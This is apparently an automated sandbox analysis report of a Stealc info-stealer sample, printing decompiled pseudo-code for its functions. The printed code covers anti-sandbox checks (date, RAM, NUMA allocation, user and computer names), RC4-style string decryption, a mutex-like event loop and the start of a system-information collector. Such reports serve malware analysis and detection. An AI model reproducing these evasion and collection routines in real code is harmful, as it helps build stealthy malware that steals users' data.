				SystemTimeToFileTime( &_v36,  &_v60);
				_t39 = _v68.dwHighDateTime;
				_t54 = _t39 - _v60.dwHighDateTime;
				if(_t54 >= 0) {
					if(_t54 > 0) {
						L3:
						ExitProcess(0); // executed
					}
					_t39 = _v68.dwLowDateTime;
					if(_t39 > _v60.dwLowDateTime) {
						goto L3;
					}
				}
				return _t39;
			}

0x0017ced6
0x0017cedb
0x0017cee4
0x0017cee5
0x0017cee6
0x0017cee7
0x0017ceeb
0x0017cef4
0x0017cef5
0x0017cef6
0x0017cef7
0x0017cefb
0x0017cf03
0x0017cf08
0x0017cf0e
0x0017cf34
0x0017cf41
0x0017cf50
0x0017cf60
0x0017cf66
0x0017cf6a
0x0017cf6e
0x0017cf70
0x0017cf7c
0x0017cf7e
0x0017cf7e
0x0017cf72
0x0017cf7a
0x00000000
0x00000000
0x0017cf7a
0x0017cf88

APIs

GetSystemTime.KERNEL32(?), ref: 0017CF0E
sscanf.NTDLL ref: 0017CF34
SystemTimeToFileTime.KERNEL32(?,?), ref: 0017CF50
SystemTimeToFileTime.KERNEL32(?,?), ref: 0017CF60
ExitProcess.KERNEL32 ref: 0017CF7E

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 22389b14c52b972b17c494ebceb31477da1997033b080408f44192d259f56156
Instruction ID: a1bd5dcd7d4c0e5230f5d80d863c0319d4b83dbb984e4b9e3497b0b234974a1e
Opcode Fuzzy Hash: 22389b14c52b972b17c494ebceb31477da1997033b080408f44192d259f56156
Instruction Fuzzy Hash: 7A211A72018341BFD341DBA8D84599BB7F9BF88714F404E2DF599D2160E730E6088B93

Uniqueness

Uniqueness Score: -1.00%

Function 0017D193 Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0017D193(void* __ecx) {
				long _v8;
				CHAR* _t10;

				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_t10,  &_v8); // executed
				return _t10;
			}

0x0017d1ac
0x0017d1b3
0x0017d1ba
0x0017d1c4

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001710AA,0017CFE5,0017FBD9), ref: 0017D19F
RtlAllocateHeap.NTDLL(00000000), ref: 0017D1A6
GetUserNameA.ADVAPI32(00000000,?), ref: 0017D1BA

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: d1b877a6483166fcbcb82f813b020b381b4560b9081712e254f2a8579433326b
Instruction ID: 156cad130e7a8ff7c98eeec7aa26d7f60aec48a6c646ecf7e979893480d92cf1
Opcode Fuzzy Hash: d1b877a6483166fcbcb82f813b020b381b4560b9081712e254f2a8579433326b
Instruction Fuzzy Hash: CED09BF5604304BBD70157A5DC4DE9A77BCD789B55F100195F602D2350E6F0DA448771

Uniqueness

Uniqueness Score: -1.00%

Function 0017CF89 Relevance: 9.1, APIs: 6, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				CHAR* _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				void* _t23;
				void* _t24;
				void* _t42;
				CHAR* _t57;
				void* _t58;
				void* _t59;
				void* _t70;
				void* _t71;
				void* _t72;

				if(_t71 != 0 && _t71 == 0) {
				}
				E0017190F(_t58);
				if(_t71 != 0 && _t71 == 0) {
				}
				E0017DD84(_t58); // executed
				E0017E990( &_v16, _t71, 0x17fbd9);
				if(_t71 != 0 && _t71 == 0) {
				}
				E00171010(_t58); // executed
				if(_t71 != 0 && _t71 == 0) {
				}
				E001710C1();
				if(_t71 != 0 && _t71 == 0) {
				}
				E001710FD(); // executed
				if(_t71 != 0 && _t71 == 0) {
				}
				E0017CDD0();
				if(_t71 != 0 && _t71 == 0) {
				}
				E00171091(); // executed
				_t23 = E0017D193(_t58); // executed
				_t62 = "_";
				_t24 = E0017D1C5(_t58);
				E0017EA2F(E0017EAAB(E0017EAAB(E0017EAAB(E0017EAAB(E0017EAAB( &_v16, _t58,  &_v76, _t71,  *0x383454), _t58,  &_v64, _t71, "_"), _t58,  &_v52, _t71, _t24), _t58,  &_v40, _t71, _t62), _t58,  &_v28, _t71, _t23), _t58,  &_v16);
				E00171839(_v28);
				E00171839(_v40);
				E00171839(_v52);
				E00171839(_v64);
				E00171839(_v76);
				_t57 = _v16;
				while(1) {
					_t42 = OpenEventA(0x1f0003, 0, _t57);
					_t72 = _t42;
					if(_t72 == 0) {
						break;
					}
					CloseHandle(_t42);
					Sleep(0x1770);
				}
				_t70 = CreateEventA(0, 0, 0, _t57);
				if(_t72 != 0 && _t72 == 0) {
				}
				E0017CECA(); // executed
				if(_t72 != 0 && _t72 == 0) {
				}
				E0017C73D(_t58, _t59, _t72);
				CloseHandle(_t70);
				ExitProcess(0);
			}

0x0017cf92
0x0017cf92
0x0017cf97
0x0017cf9c
0x0017cf9c
0x0017cfa1
0x0017cfae
0x0017cfb3
0x0017cfb3
0x0017cfb8
0x0017cfbd
0x0017cfbd
0x0017cfc2
0x0017cfc7
0x0017cfc7
0x0017cfcc
0x0017cfd1
0x0017cfd1
0x0017cfd6
0x0017cfdb
0x0017cfdb
0x0017cfe0
0x0017cfe5
0x0017cfeb
0x0017cff1
0x0017d02c
0x0017d034
0x0017d03c
0x0017d044
0x0017d04c
0x0017d054
0x0017d059
0x0017d077
0x0017d07a
0x0017d080
0x0017d082
0x00000000
0x00000000
0x0017d066
0x0017d071
0x0017d071
0x0017d08e
0x0017d090
0x0017d090
0x0017d095
0x0017d09a
0x0017d09a
0x0017d09f
0x0017d0a5
0x0017d0ac

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9194ba073693bf59a9659f0b5d61a593b0f13a12a7cf9f17c11c7c758ec17e2
Instruction ID: fbaf3b888eb6f1883e99beeb2eb2522923a7ba59d4405eeee1a59f4d9ac9616b
Opcode Fuzzy Hash: f9194ba073693bf59a9659f0b5d61a593b0f13a12a7cf9f17c11c7c758ec17e2
Instruction Fuzzy Hash: A1416631D00214BFCB21BBBDDC4ACADBBF9AF64710B148499F40CA7172DB205E428BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00171010 Relevance: 7.6, APIs: 5, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 32%

			E00171010(void* __ecx) {
				void* _v8;
				void* _t7;
				void* _t8;
				int _t10;
				void* _t13;
				void* _t19;
				void* _t24;

				_t7 =  *0x383758(GetCurrentProcess(), 0, 0x7d0, 0x3000, 0x40, 0, _t19, _t24, _t13, __ecx); // executed
				if(_t7 == 0) {
					ExitProcess(0);
				}
				_t8 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
				_v8 = _t8;
				_push(_t8);
				if(_t8 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t10);
				if(_v8 != 0) {
					memset(_v8, 0, 0x5e69ec0 << 0);
					_push(_t13);
					asm("cld");
					_t10 = VirtualFree(_v8, 0x17c841c0, 0x8000);
				}
				return _t10;
			}

0x0017102f
0x00171037
0x0017103a
0x0017103a
0x0017104a
0x00171050
0x00171053
0x00171057
0x0017105b
0x0017105c
0x00171060
0x00171061
0x00171065
0x00171074
0x00171076
0x0017107b
0x00171086
0x00171086
0x00171090

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 00171028
VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 0017102F
ExitProcess.KERNEL32 ref: 0017103A
VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,?,?,0017CFBD,0017FBD9), ref: 0017104A
VirtualFree.KERNEL32(?,17C841C0,00008000,?,?,?,?,?,0017CFBD,0017FBD9), ref: 00171086

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma
String ID:
API String ID: 3477276466-0
Opcode ID: 1f10587236ab29860dda2adc8542ca16c538f630ee51b1ef24b418493b6cfdf1
Instruction ID: c3f44192d63e2db7d64d129756df411775838b011544c290c84b30c128b412a4
Opcode Fuzzy Hash: 1f10587236ab29860dda2adc8542ca16c538f630ee51b1ef24b418493b6cfdf1
Instruction Fuzzy Hash: 0001A7B2601214BBE71157699C8DFABBBBCEB86B51F204055F505E3350D6359E00D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0017D1C5 Relevance: 4.5, APIs: 3, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0017D1C5(void* __ecx) {
				long _v8;
				int _t6;
				CHAR* _t7;
				CHAR* _t10;

				_t10 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				_t6 = GetComputerNameA(_t10,  &_v8); // executed
				_t7 = 0x17fbd9;
				if(_t6 != 0) {
					_t7 = _t10;
				}
				return _t7;
			}

0x0017d1de
0x0017d1e5
0x0017d1ec
0x0017d1f4
0x0017d1f9
0x0017d1fb
0x0017d1fb
0x0017d1ff

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00171096,0017CFE5,0017FBD9), ref: 0017D1D1
RtlAllocateHeap.NTDLL(00000000), ref: 0017D1D8
GetComputerNameA.KERNEL32(00000000,?), ref: 0017D1EC

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: df8a9f6128ca364c18f4b7e75b77b8be064f31b266389f4f7e9c76a1ffca3f36
Instruction ID: a1f75ad1273b4632a87177ade1faa74bc57b9938824f76b0d11ecd780c997d79
Opcode Fuzzy Hash: df8a9f6128ca364c18f4b7e75b77b8be064f31b266389f4f7e9c76a1ffca3f36
Instruction Fuzzy Hash: 11E0ECF6300308ABE7119BB9DD4DA9A76BCEB88B55F0440A5B606D2290D6B0DA018731

Uniqueness

Uniqueness Score: -1.00%

Function 001710FD Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001710FD() {
				unsigned int _v60;
				signed int _v64;
				intOrPtr _v68;
				unsigned int _t7;
				struct _MEMORYSTATUSEX* _t8;
				unsigned int _t9;
				unsigned int _t10;
				intOrPtr _t11;
				signed int _t12;
				signed int _t14;
				struct _MEMORYSTATUSEX* _t16;
				unsigned int _t21;

				_t16 = (_t14 & 0xfffffff8) - 0x40;
				_t7 = 0;
				_t11 = 0x40;
				do {
					 *((char*)(_t16 + _t7)) = 0;
					if (_t7 != 0) goto L2;
					_t7 = _t7 + 1;
				} while (_t7 < _t11);
				_t8 = _t16;
				_v68 = _t11;
				GlobalMemoryStatusEx(_t8); // executed
				if(_t8 != 1) {
					_t12 = 0;
					_t9 = 0;
				} else {
					_t10 = _v60;
					_t12 = (_t10 << 0x00000020 | _v64) >> 0x14;
					_t9 = _t10 >> 0x14;
				}
				_t21 = _t9;
				if(_t21 <= 0 && (_t21 < 0 || _t12 < 0x457)) {
					ExitProcess(0);
				}
				return _t9;
			}

0x00171103
0x00171108
0x0017110a
0x0017110b
0x0017110b
0x00171111
0x00171113
0x00171114
0x00171118
0x0017111c
0x00171120
0x00171129
0x0017113c
0x0017113e
0x0017112b
0x0017112b
0x00171133
0x00171137
0x00171137
0x00171140
0x00171142
0x00171150
0x00171150
0x00171159

APIs

GlobalMemoryStatusEx.KERNELBASE(00000001,?,?,?,?,?,?,?,?,?,?,?,0017CFD1,0017FBD9), ref: 00171120
ExitProcess.KERNEL32 ref: 00171150

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID:
API String ID: 803317263-0
Opcode ID: 75057a7245272744d7017cbf545540164242f31c676ffe85c7dc875dd9a40e7e
Instruction ID: e50939637fee94b66e5d5ae3dc5656f8a00e2696aaef9bb6a7c1bfb00814f71c
Opcode Fuzzy Hash: 75057a7245272744d7017cbf545540164242f31c676ffe85c7dc875dd9a40e7e
Instruction Fuzzy Hash: 7CF0B4706183056BE7249A7C9C55329B3F8D700711F90C92EEB5EC53C0EB70C500C25A

Uniqueness

Uniqueness Score: -1.00%

Function 00173083 Relevance: 2.6, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00173083(intOrPtr _a4) {
				char _v8;
				char _v12;
				void* _v16;
				signed int _t20;
				signed int _t22;
				signed int _t38;
				signed int _t39;
				signed int _t45;

				_t20 = E0017D781(_a4);
				_t49 = _t20;
				_t38 = 3;
				_t45 = _t20 % _t38;
				_t22 = _t20;
				if(_t45 != 0) {
					_t22 = _t22 - _t45 + _t38;
				}
				_t39 = 6;
				_v8 = malloc((_t22 << 3) / _t39 + 1);
				E0017186D(_a4, _t26, _t49);
				_v12 = malloc(4);
				E00172F36(_v8,  &_v12); // executed
				_v16 =  &_v8;
				memset(_v16, 0, 4 << 0);
				return _v12;
			}

0x0017308e
0x00173097
0x00173099
0x0017309a
0x0017309c
0x001730a0
0x001730a4
0x001730a4
0x001730ad
0x001730c1
0x001730c4
0x001730cd
0x001730d7
0x001730e2
0x001730ef
0x001730f7

APIs

malloc.MSVCRT ref: 001730B8
malloc.MSVCRT ref: 001730CB

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 30dba3b85b8bd1316caff23512ff9e9c7f0fcea2d0b1f187321343b4205a99bc
Instruction ID: 2099ddc63dea4ab34fc37e6fa46207d2077aa30aed18691814a49026ce8b03f9
Opcode Fuzzy Hash: 30dba3b85b8bd1316caff23512ff9e9c7f0fcea2d0b1f187321343b4205a99bc
Instruction Fuzzy Hash: A1014472F00108ABDB08DBADDC45A9DBBFAEBC4350F14817AF508E3245DF719A118A54

Uniqueness

Uniqueness Score: -1.00%

Function 00171091 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00171091() {
				void* _t1;
				int _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t5;
				intOrPtr _t6;

				_t1 = E0017D1C5(_t4);
				_t5 =  *0x383454; // 0xdc10b8
				_t2 = E0017D733(_t1, _t4, _t5);
				if(_t2 == 0) {
					_t3 = E0017D193(_t4);
					_t6 =  *0x38350c; // 0xdc1168
					_t2 = E0017D733(_t3, _t4, _t6);
					if(_t2 == 0) {
						ExitProcess(_t2);
					}
				}
				return _t2;
			}

0x00171091
0x00171096
0x0017109c
0x001710a3
0x001710a5
0x001710aa
0x001710b0
0x001710b7
0x001710ba
0x001710ba
0x001710b7
0x001710c0

APIs

Part of subcall function 0017D1C5: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00171096,0017CFE5,0017FBD9), ref: 0017D1D1
Part of subcall function 0017D1C5: RtlAllocateHeap.NTDLL(00000000), ref: 0017D1D8
Part of subcall function 0017D1C5: GetComputerNameA.KERNEL32(00000000,?), ref: 0017D1EC

Part of subcall function 0017D193: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001710AA,0017CFE5,0017FBD9), ref: 0017D19F
Part of subcall function 0017D193: RtlAllocateHeap.NTDLL(00000000), ref: 0017D1A6
Part of subcall function 0017D193: GetUserNameA.ADVAPI32(00000000,?), ref: 0017D1BA

ExitProcess.KERNEL32 ref: 001710BA

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 3081b0fec0958faf10fee828d6bf76c37a5fd59d1f5fd753c986f929e58e61a7
Instruction ID: ba56e51c47897bad2c1582de5e0a0c543cf66f4ccbe9e3d2f4d2f329ef3e5c83
Opcode Fuzzy Hash: 3081b0fec0958faf10fee828d6bf76c37a5fd59d1f5fd753c986f929e58e61a7
Instruction Fuzzy Hash: 36D0C93090038456AB22BF35FD5665A337D6E61784B10C664B40887326EF20DA008F40

Uniqueness

Uniqueness Score: -1.00%

Function 00172F36 Relevance: 1.4, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00172F36(intOrPtr* _a4, void** _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v20;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed int* _t63;
				signed int _t70;
				signed int _t78;
				intOrPtr* _t81;
				intOrPtr* _t86;
				intOrPtr _t87;
				signed char _t88;
				signed int _t92;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr _t97;
				signed int _t99;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				void* _t109;

				_t97 =  *0x38326c; // 0x17fbf0
				_t70 = 0;
				_t103 = 0;
				_t78 = E0017D781(_t97);
				do {
					_t92 = _t103 % _t78;
					 *(_t109 + _t103 * 4 - 0x410) = _t103;
					_t103 = _t103 + 1;
					 *(_t109 + _t103 * 4 - 0x814) =  *(_t92 + _t97) & 0x000000ff;
				} while (_t103 < 0x100);
				_t93 = 0;
				do {
					_t55 = _t109 + _t93 - 0x410;
					_t104 =  *_t55;
					_t70 = _t70 +  *((intOrPtr*)(_t109 + _t93 - 0x810)) + _t104 & 0x800000ff;
					if(_t70 < 0) {
						_t70 = (_t70 - 0x00000001 | 0xffffff00) + 1;
					}
					_t81 = _t109 + _t70 * 4 - 0x410;
					_t93 = _t93 + 4;
					 *_t55 =  *_t81;
					 *_t81 = _t104;
				} while (_t93 < 0x400);
				_t56 = E0017D781(_a4);
				_t20 = _t56 + 1; // 0x1
				_t58 = malloc(_t20); // executed
				_t105 = 0;
				_t99 = 0;
				_v20 = _t58;
				_v12 = 0;
				if(_t56 > 0) {
					_t86 = _a4;
					_v8 = _t58;
					_v8 = _v8 - _t86;
					_v16 = _t86;
					do {
						_t105 = _t105 + 0x00000001 & 0x800000ff;
						if(_t105 < 0) {
							_t105 = (_t105 - 0x00000001 | 0xffffff00) + 1;
						}
						_t59 = _t109 + _t105 * 4 - 0x410;
						_t87 =  *_t59;
						_t99 = _t99 + _t87 & 0x800000ff;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xffffff00) + 1;
						}
						_t94 = _t109 + _t99 * 4 - 0x410;
						 *_t59 =  *_t94;
						 *_t94 = _t87;
						_t62 =  *_t59 + _t87 & 0x800000ff;
						if(_t62 < 0) {
							_t62 = (_t62 - 0x00000001 | 0xffffff00) + 1;
						}
						_t95 = _v16;
						_t88 =  *_t95;
						_t63 = _t109 + _t62 * 4 - 0x410;
						if( *_t63 != (_t88 & 0x000000ff)) {
							 *(_v8 + _t95) =  *_t63 ^ _t88;
						} else {
							 *(_v8 + _t95) = _t88;
						}
						_v12 = _v12 + 1;
						_v16 = _t95 + 1;
					} while (_v12 < E0017D781(_a4));
					_t58 = _v20;
				}
				 *((char*)(_t58 + _v12)) = 0;
				 *_a8 = _t58;
				return _t58;
			}

0x00172f42
0x00172f4a
0x00172f4c
0x00172f53
0x00172f55
0x00172f59
0x00172f5b
0x00172f62
0x00172f67
0x00172f6e
0x00172f76
0x00172f78
0x00172f7f
0x00172f86
0x00172f8c
0x00172f92
0x00172f9b
0x00172f9b
0x00172f9c
0x00172fa5
0x00172fa8
0x00172faa
0x00172fac
0x00172fb7
0x00172fbe
0x00172fc2
0x00172fc8
0x00172fca
0x00172fcd
0x00172fd0
0x00172fd5
0x00172fdb
0x00172fde
0x00172fe1
0x00172fe4
0x00172fe7
0x00172fe8
0x00172fee
0x00172ff7
0x00172ff7
0x00172ff8
0x00172fff
0x00173003
0x00173009
0x00173012
0x00173012
0x00173013
0x0017301c
0x0017301e
0x00173024
0x00173029
0x00173031
0x00173031
0x00173032
0x00173035
0x0017303a
0x00173043
0x00173054
0x00173045
0x00173048
0x00173048
0x00173057
0x0017305e
0x00173066
0x0017306f
0x0017306f
0x00173076
0x0017307e
0x00173082

APIs

malloc.MSVCRT ref: 00172FC2

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1a58f88ea85b8104d3a709b2c7961bf354f5fd1c3414a0b1256196f1c05a4b6a
Instruction ID: 345407be096df158fcc997cb47ce993455707ffb88520861e836cd771e7759ab
Opcode Fuzzy Hash: 1a58f88ea85b8104d3a709b2c7961bf354f5fd1c3414a0b1256196f1c05a4b6a
Instruction Fuzzy Hash: AA410575A002199FCB05CFA8D8806E8B7B1FF99318F2485B9D869D7391C7306A42DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001792E7 Relevance: 42.9, APIs: 16, Strings: 8, Instructions: 857
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E001792E7(signed int __ecx, void* __eflags, char _a4) {
				char _v16;
				char _v27;
				char _v28;
				char _v40;
				signed int _v44;
				char _v56;
				char _v60;
				signed short _v64;
				signed short _v66;
				signed short _v68;
				signed short _v70;
				char _v72;
				signed short _v74;
				signed short _v76;
				intOrPtr _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				struct _SYSTEM_INFO _v312;
				unsigned int _v328;
				signed int _v332;
				char _v340;
				signed int _v516;
				char _v1516;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t436;
				intOrPtr _t456;
				void* _t505;
				void* _t550;
				void* _t551;
				void* _t570;
				intOrPtr _t590;
				void* _t609;
				long _t663;
				struct _MEMORYSTATUSEX* _t664;
				unsigned int _t665;
				signed int _t682;
				intOrPtr _t683;
				intOrPtr _t684;
				void* _t687;
				void* _t746;
				void* _t765;
				unsigned int _t806;
				signed int _t809;
				signed int _t818;
				void* _t819;
				signed int _t820;
				void* _t822;
				void* _t824;
				void* _t867;
				void* _t899;
				void* _t925;
				void* _t944;
				void* _t992;
				void* _t993;
				void* _t994;
				void* _t995;
				signed int _t1006;

				_t1001 = __eflags;
				_t818 = __ecx;
				E0017E990( &_v16, __eflags, 0x17fbd9);
				_t814 = "\n";
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, __eflags, "\n"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "Network Info:"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\t- IP: IP?"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\t- Country: ISO?"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, "\n"), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001, _t814), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001,  *0x3830d0), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001,  *0x383004), _t818,  &_v16);
				E00171839(_v40);
				E0017EA2F(E0017EA69( &_v16, _t818, E0017D0BE( &_v40),  &_v28, _t1001), _t818,  &_v16);
				E00171839(_v28);
				E00171839(_v40);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v28, _t1001, _t814), _t818,  &_v16);
				E00171839(_v28);
				E0017EA2F(E0017EAAB( &_v16, _t818,  &_v40, _t1001,  *0x383290), _t818,  &_v16);
				E00171839(_v40);
